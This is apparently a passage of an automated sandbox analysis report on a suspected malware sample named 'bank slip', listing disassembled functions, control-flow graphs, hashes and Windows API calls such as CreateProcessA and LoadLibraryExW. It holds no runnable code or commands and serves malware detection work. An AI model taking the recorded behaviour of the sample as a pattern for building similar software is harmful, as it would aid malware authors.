                                                                      • Instruction Fuzzy Hash: 69E2D534A14219CFDB15DF28C894AD9B7B2FF89304F5585E9E909AB361DB31AE81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 06A147B8 Relevance: .3, Instructions: 341COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6175217b100708d097b9791f6139bca4ca46ed447a81a223019b14e2966caf0f
                                                                      • Instruction ID: 64a95439a6da17432dc8b7799ce270b0b3c928e7120bd6f3ec997ee4fe93f360
                                                                      • Opcode Fuzzy Hash: 6175217b100708d097b9791f6139bca4ca46ed447a81a223019b14e2966caf0f
                                                                      • Instruction Fuzzy Hash: 01C19A70B016058FEB99EB79C960B6EB7E6EFC9700F144469D156CF290CB34E901CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 06A10125 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a5aac4fa7def37e708f54016b694b9e1309f0b1d49809bcac66e9c04408b28f9
                                                                      • Instruction ID: 2bc4201d1b209c51843deed1c28f9131d747e3db2a5a91e928f937cb3134f6c9
                                                                      • Opcode Fuzzy Hash: a5aac4fa7def37e708f54016b694b9e1309f0b1d49809bcac66e9c04408b28f9
                                                                      • Instruction Fuzzy Hash: 47F0F934C09388CFDB10DFA4E08469CBFB0AF06315F21949AD51AAF141CBB559C98B21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 06A13556 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e16432b2bc50289725f388e692c9e961822e1309a8eae2b23ad88dd252fdbcd
                                                                      • Instruction ID: e50c19ef4369c159cffc9273d8a46532794ca0aaf8e3f8ff6f636cbc016f3be8
                                                                      • Opcode Fuzzy Hash: 4e16432b2bc50289725f388e692c9e961822e1309a8eae2b23ad88dd252fdbcd
                                                                      • Instruction Fuzzy Hash: FED0627484D355CFEB51DF50E4845F5BBB9AB0E311F006095D50EDB211D7319585CE94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 068AFC30 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1223 68afc30-68afcc5 1225 68afcfe-68afd1e 1223->1225 1226 68afcc7-68afcd1 1223->1226 1231 68afd20-68afd2a 1225->1231 1232 68afd57-68afd86 1225->1232 1226->1225 1227 68afcd3-68afcd5 1226->1227 1229 68afcf8-68afcfb 1227->1229 1230 68afcd7-68afce1 1227->1230 1229->1225 1233 68afce3 1230->1233 1234 68afce5-68afcf4 1230->1234 1231->1232 1235 68afd2c-68afd2e 1231->1235 1242 68afd88-68afd92 1232->1242 1243 68afdbf-68afe79 CreateProcessA 1232->1243 1233->1234 1234->1234 1236 68afcf6 1234->1236 1237 68afd30-68afd3a 1235->1237 1238 68afd51-68afd54 1235->1238 1236->1229 1240 68afd3e-68afd4d 1237->1240 1241 68afd3c 1237->1241 1238->1232 1240->1240 1244 68afd4f 1240->1244 1241->1240 1242->1243 1245 68afd94-68afd96 1242->1245 1254 68afe7b-68afe81 1243->1254 1255 68afe82-68aff08 1243->1255 1244->1238 1246 68afd98-68afda2 1245->1246 1247 68afdb9-68afdbc 1245->1247 1249 68afda6-68afdb5 1246->1249 1250 68afda4 1246->1250 1247->1243 1249->1249 1251 68afdb7 1249->1251 1250->1249 1251->1247 1254->1255 1265 68aff0a-68aff0e 1255->1265 1266 68aff18-68aff1c 1255->1266 1265->1266 1267 68aff10 1265->1267 1268 68aff1e-68aff22 1266->1268 1269 68aff2c-68aff30 1266->1269 1267->1266 1268->1269 1270 68aff24 1268->1270 1271 68aff32-68aff36 1269->1271 1272 68aff40-68aff44 1269->1272 1270->1269 1271->1272 1273 68aff38 1271->1273 1274 68aff56-68aff5d 1272->1274 1275 68aff46-68aff4c 1272->1275 1273->1272 1276 68aff5f-68aff6e 1274->1276 1277 68aff74 1274->1277 1275->1274 1276->1277
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 068AFE66
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075061318.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_68a0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0ddd8900f4be7d2e0ad59596a6b834118b4d1ecf4ddcc800a588bcd26141e2d5
                                                                      • Instruction ID: ff8f5f567eb0bfc5dee6a0950c3aaee1fed89beda1291420fa4c91dab571d2aa
                                                                      • Opcode Fuzzy Hash: 0ddd8900f4be7d2e0ad59596a6b834118b4d1ecf4ddcc800a588bcd26141e2d5
                                                                      • Instruction Fuzzy Hash: FB915971D003198FEB61DF69C841BEEBBB2BF49310F1485A9E909E7280DB749985CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0259B700 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1279 259b700-259b71f 1280 259b74b-259b74f 1279->1280 1281 259b721-259b72e call 2598c54 1279->1281 1282 259b751-259b75b 1280->1282 1283 259b763-259b7a4 1280->1283 1288 259b730 1281->1288 1289 259b744 1281->1289 1282->1283 1290 259b7b1-259b7bf 1283->1290 1291 259b7a6-259b7ae 1283->1291 1336 259b736 call 259b999 1288->1336 1337 259b736 call 259b9a8 1288->1337 1289->1280 1292 259b7c1-259b7c6 1290->1292 1293 259b7e3-259b7e5 1290->1293 1291->1290 1296 259b7c8-259b7cf call 259ac08 1292->1296 1297 259b7d1 1292->1297 1295 259b7e8-259b7ef 1293->1295 1294 259b73c-259b73e 1294->1289 1298 259b880-259b940 1294->1298 1299 259b7fc-259b803 1295->1299 1300 259b7f1-259b7f9 1295->1300 1302 259b7d3-259b7e1 1296->1302 1297->1302 1329 259b948-259b973 GetModuleHandleW 1298->1329 1330 259b942-259b945 1298->1330 1303 259b810-259b819 call 259ac18 1299->1303 1304 259b805-259b80d 1299->1304 1300->1299 1302->1295 1310 259b81b-259b823 1303->1310 1311 259b826-259b82b 1303->1311 1304->1303 1310->1311 1312 259b849-259b84d 1311->1312 1313 259b82d-259b834 1311->1313 1334 259b850 call 259bca8 1312->1334 1335 259b850 call 259bc81 1312->1335 1313->1312 1315 259b836-259b846 call 259ac28 call 259ac38 1313->1315 1315->1312 1316 259b853-259b856 1319 259b879-259b87f 1316->1319 1320 259b858-259b876 1316->1320 1320->1319 1331 259b97c-259b990 1329->1331 1332 259b975-259b97b 1329->1332 1330->1329 1332->1331 1334->1316 1335->1316 1336->1294 1337->1294
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0259B966
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 12885ac9975fe04367bd886587da835d899934b4ab7d995e0b8cc0fa3d48f4b1
                                                                      • Instruction ID: 7f1583112e89df05e04973f3eb264b12f10cc8ef2c2de26ba74788c102673762
                                                                      • Opcode Fuzzy Hash: 12885ac9975fe04367bd886587da835d899934b4ab7d995e0b8cc0fa3d48f4b1
                                                                      • Instruction Fuzzy Hash: 2B8148B0A00B058FEB24DF29D44475ABBF2FF88314F108A2DD48ADBA50D735E949CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04BA016A Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1338 4ba016a-4ba2236 1342 4ba2238-4ba223e 1338->1342 1343 4ba2241-4ba2248 1338->1343 1342->1343 1344 4ba224a-4ba2250 1343->1344 1345 4ba2253-4ba228b 1343->1345 1344->1345 1346 4ba2293-4ba22f2 CreateWindowExW 1345->1346 1347 4ba22fb-4ba2333 1346->1347 1348 4ba22f4-4ba22fa 1346->1348 1352 4ba2340 1347->1352 1353 4ba2335-4ba2338 1347->1353 1348->1347 1354 4ba2341 1352->1354 1353->1352 1354->1354
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BA22E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 51f5e0bc41cda105f2aaa14dbfb6a39cb9eb0efd9724dc956ed3df38fc451a61
                                                                      • Instruction ID: 823323396872f97aaca3d3bbcd06374c7bb46f17491700d47a2102c5bfd73eed
                                                                      • Opcode Fuzzy Hash: 51f5e0bc41cda105f2aaa14dbfb6a39cb9eb0efd9724dc956ed3df38fc451a61
                                                                      • Instruction Fuzzy Hash: 9051E0B1D14349AFDF14CF99C884ADEBBB5FF48314F24856AE818AB210D770A895CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04BA0190 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1355 4ba0190-4ba2236 1357 4ba2238-4ba223e 1355->1357 1358 4ba2241-4ba2248 1355->1358 1357->1358 1359 4ba224a-4ba2250 1358->1359 1360 4ba2253-4ba22f2 CreateWindowExW 1358->1360 1359->1360 1362 4ba22fb-4ba2333 1360->1362 1363 4ba22f4-4ba22fa 1360->1363 1367 4ba2340 1362->1367 1368 4ba2335-4ba2338 1362->1368 1363->1362 1369 4ba2341 1367->1369 1368->1367 1369->1369
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BA22E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: ab4465d7205be398147ef2a26e8c4ec4a59cfb716123732e21bc1efe439a7ba8
                                                                      • Instruction ID: a542b268a7274af2dde5ea0f066ee2df3ab86d9729d14373d36ef8eb8f068062
                                                                      • Opcode Fuzzy Hash: ab4465d7205be398147ef2a26e8c4ec4a59cfb716123732e21bc1efe439a7ba8
                                                                      • Instruction Fuzzy Hash: FA51CEB1D14309AFDB18CF99C884ADEBBB5FF48310F24856AE818AB210D770A855CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04BA21CB Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1370 4ba21cb-4ba2236 1371 4ba2238-4ba223e 1370->1371 1372 4ba2241-4ba2248 1370->1372 1371->1372 1373 4ba224a-4ba2250 1372->1373 1374 4ba2253-4ba228b 1372->1374 1373->1374 1375 4ba2293-4ba22f2 CreateWindowExW 1374->1375 1376 4ba22fb-4ba2333 1375->1376 1377 4ba22f4-4ba22fa 1375->1377 1381 4ba2340 1376->1381 1382 4ba2335-4ba2338 1376->1382 1377->1376 1383 4ba2341 1381->1383 1382->1381 1383->1383
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BA22E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID:
                                                                      • API String ID: 716092398-0
                                                                      • Opcode ID: 1a93d5febd124769ee4d88c516873ebfe036048b20c530c3c08a058d290fabf7
                                                                      • Instruction ID: 98cf0f9b6ca36009fd95fd19d9fc745d55f67da15ad2ed40135f879f3799cd51
                                                                      • Opcode Fuzzy Hash: 1a93d5febd124769ee4d88c516873ebfe036048b20c530c3c08a058d290fabf7
                                                                      • Instruction Fuzzy Hash: F341CDB5D103099FDF18CF99C984ADEBBB5FF48310F24856AE818AB210D770A895CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 025958EC Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1384 25958ec-259596c 1385 259596f-25959b9 CreateActCtxA 1384->1385 1387 25959bb-25959c1 1385->1387 1388 25959c2-2595a1c 1385->1388 1387->1388 1395 2595a2b-2595a2f 1388->1395 1396 2595a1e-2595a21 1388->1396 1397 2595a31-2595a3d 1395->1397 1398 2595a40-2595a70 1395->1398 1396->1395 1397->1398 1402 2595a22-2595a27 1398->1402 1403 2595a72-2595af4 1398->1403 1402->1395
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 025959A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 7ebb68a90460fa0a96c1ac042eb18a3fdb072106c963da3d15a6e7eb2063605d
                                                                      • Instruction ID: 2e512ce45104a804e8ee903f80c93a50adff80cabb23d47b4c1426f6eb9ffc85
                                                                      • Opcode Fuzzy Hash: 7ebb68a90460fa0a96c1ac042eb18a3fdb072106c963da3d15a6e7eb2063605d
                                                                      • Instruction Fuzzy Hash: E341F2B0C00719CFDB25DFA9C884BCDBBB1BF49304F60806AD409AB251DB75694ACF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04BA02E4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1406 4ba02e4-4ba47dc 1409 4ba488c-4ba48ac call 4ba01bc 1406->1409 1410 4ba47e2-4ba47e7 1406->1410 1417 4ba48af-4ba48bc 1409->1417 1411 4ba483a-4ba4872 CallWindowProcW 1410->1411 1412 4ba47e9-4ba4820 1410->1412 1415 4ba487b-4ba488a 1411->1415 1416 4ba4874-4ba487a 1411->1416 1419 4ba4829-4ba4838 1412->1419 1420 4ba4822-4ba4828 1412->1420 1415->1417 1416->1415 1419->1417 1420->1419
                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04BA4861
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID:
                                                                      • API String ID: 2714655100-0
                                                                      • Opcode ID: 3e0b669a5da58d3786d7680f786260dd96b9e08d0bb694d784d61a1a4b6a5774
                                                                      • Instruction ID: 650d4a4f91afd684b1526941a922e415eb169b35ddf9e21bd34d4a0a0a4c2a63
                                                                      • Opcode Fuzzy Hash: 3e0b669a5da58d3786d7680f786260dd96b9e08d0bb694d784d61a1a4b6a5774
                                                                      • Instruction Fuzzy Hash: 3B4138B5E002459FDB14CF99D888AAABBF5FF88314F24C499E519A7320D374A841CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 025944E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?), ref: 025959A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: b9c72454a8b75f60e30f60abb460e0c4d18d97860f2fdd780dc62c01ab1da4b0
                                                                      • Instruction ID: 8f2e9e91214300ac9a0909ccbbc22f6f63c4b0f6fb47de000cc48c378cea5dfd
                                                                      • Opcode Fuzzy Hash: b9c72454a8b75f60e30f60abb460e0c4d18d97860f2fdd780dc62c01ab1da4b0
                                                                      • Instruction Fuzzy Hash: 0A41FFB0C00719CFDB25DFA9C884B9EBBB5BF48304F60806AD408AB251DB716949CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02595A64 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e4dc47150a7cf1caa9ebbf332a129f923d7f0ec47a7e12cd02d5dc9c0e3e15cf
                                                                      • Instruction ID: 213aae869d3baec267a692fb499f92278d537a8d302b2495ebde5fb5fe4945e8
                                                                      • Opcode Fuzzy Hash: e4dc47150a7cf1caa9ebbf332a129f923d7f0ec47a7e12cd02d5dc9c0e3e15cf
                                                                      • Instruction Fuzzy Hash: 6131CDB0804649CFEF12DFA8C9947DDBBF1BF46314F90818AC405AB251E775A94ACB05
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0259CE80 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0259DBA6,?,?,?,?,?), ref: 0259DC67
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: cdd924c9e89e0f42cc50db631eccf5439cb6248819bcf155c28c35d31e977d41
                                                                      • Instruction ID: 8e49e2182563c12658377d3a94fd94c22c3b59dcb84d2c9073f64ae74fff66df
                                                                      • Opcode Fuzzy Hash: cdd924c9e89e0f42cc50db631eccf5439cb6248819bcf155c28c35d31e977d41
                                                                      • Instruction Fuzzy Hash: 032105B5D00209DFDB10DF9AD584ADEBBF4FB48310F14841AE918A3310C374A950CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0259AC60 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0259B9E1,00000800,00000000,00000000), ref: 0259BBF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 069c02fb1af12a050661823c5a6200dab160cf78ab3e755329ddab49e0468756
                                                                      • Instruction ID: a90a1d323eaeac581d7cc754f8806e0c0783ec26a9b73385db8f8b0698366760
                                                                      • Opcode Fuzzy Hash: 069c02fb1af12a050661823c5a6200dab160cf78ab3e755329ddab49e0468756
                                                                      • Instruction Fuzzy Hash: 2D1100B6D003499FDB10CF9AD844A9EFBF9EB88314F10842AE429A7640C379A545CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0259BB80 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0259B9E1,00000800,00000000,00000000), ref: 0259BBF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: e45e4d08912f66071fac121dc3dec35cfca06f55c7e547edcf01e046d031aba4
                                                                      • Instruction ID: 13dab730903bf37954ce69e2e923460c40e06dc51b185199de08fadaa837f770
                                                                      • Opcode Fuzzy Hash: e45e4d08912f66071fac121dc3dec35cfca06f55c7e547edcf01e046d031aba4
                                                                      • Instruction Fuzzy Hash: 5111EFB6D003498FDB10CF9AD544ADEFBF5BB88324F14842EE829A7640C379A545CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 06A12680 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A144AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: b85f7696c3d063332074d98b1ceb5f0800147af102d8ab060b958af5c79ff203
                                                                      • Instruction ID: ff5feeea5787c9d83c68d584b181481971afad67973e9b2c1e3dba9eb250501a
                                                                      • Opcode Fuzzy Hash: b85f7696c3d063332074d98b1ceb5f0800147af102d8ab060b958af5c79ff203
                                                                      • Instruction Fuzzy Hash: 571103B58003499FDB10DF9AD889BDEBBF8EB48320F20845AE519B7240C375A944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0259B900 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0259B966
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2071572614.0000000002590000.00000040.00000800.00020000.00000000.sdmp, Offset: 02590000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2590000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      • Opcode ID: 4f50ee04f77a50d2f1a504abd6779b99d31b00894104f53a05c4bd59423addd1
                                                                      • Instruction ID: 55b3005cb6b18978420b8270122a549f25af839f22dde4bc0b9095b580c3c4b5
                                                                      • Opcode Fuzzy Hash: 4f50ee04f77a50d2f1a504abd6779b99d31b00894104f53a05c4bd59423addd1
                                                                      • Instruction Fuzzy Hash: 18110FB6C102498FDB10CF9AD444ADEFBF4AB88224F10845AD429B7210C375A545CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 06A14449 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A144AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2075096399.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6a10000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: a8f3bf70e682368c2e87d4bc34fec44f470d49299e59766b809c0c2c2cdf51e9
                                                                      • Instruction ID: 0af836f9e9e555337e1cce092b4df7f22d93fad093da166d6d12810353347cc4
                                                                      • Opcode Fuzzy Hash: a8f3bf70e682368c2e87d4bc34fec44f470d49299e59766b809c0c2c2cdf51e9
                                                                      • Instruction Fuzzy Hash: AC11F2B58003499FDB10DF9AD849BDEFFF8EB48320F24845AE519A7240C375A984CFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0080D3D8 Relevance: .1, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2063826406.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_80d000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6191023e85df32fe36292b87a4b174bf7f53b04aa6d52d071425651486918f87
                                                                      • Instruction ID: 69bda0f6922470ad69d5693f484c6f741b01d75a219cb982522c79d30e9bd485
                                                                      • Opcode Fuzzy Hash: 6191023e85df32fe36292b87a4b174bf7f53b04aa6d52d071425651486918f87
                                                                      • Instruction Fuzzy Hash: FC2148B1500704DFDB00DF44DDC0B26BF65FB94324F24C569E9098B296C336E816C6A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009FD01C Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2067207657.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9fd000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 64b3d9851e6017974e660423c904b96b02c7e4beac0a2a58bbc7134b28bc8b8f
                                                                      • Instruction ID: e4e612ddd1e1e954fa8e5dc9ec16d9b530767ac20580ab4729d077029cc404bc
                                                                      • Opcode Fuzzy Hash: 64b3d9851e6017974e660423c904b96b02c7e4beac0a2a58bbc7134b28bc8b8f
                                                                      • Instruction Fuzzy Hash: 3E21F571504248DFDB14DF14D5C4B26BB66EB84314F38C96DDA0A4B246CB3AD807CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 009FD1D4 Relevance: .1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2067207657.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9fd000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
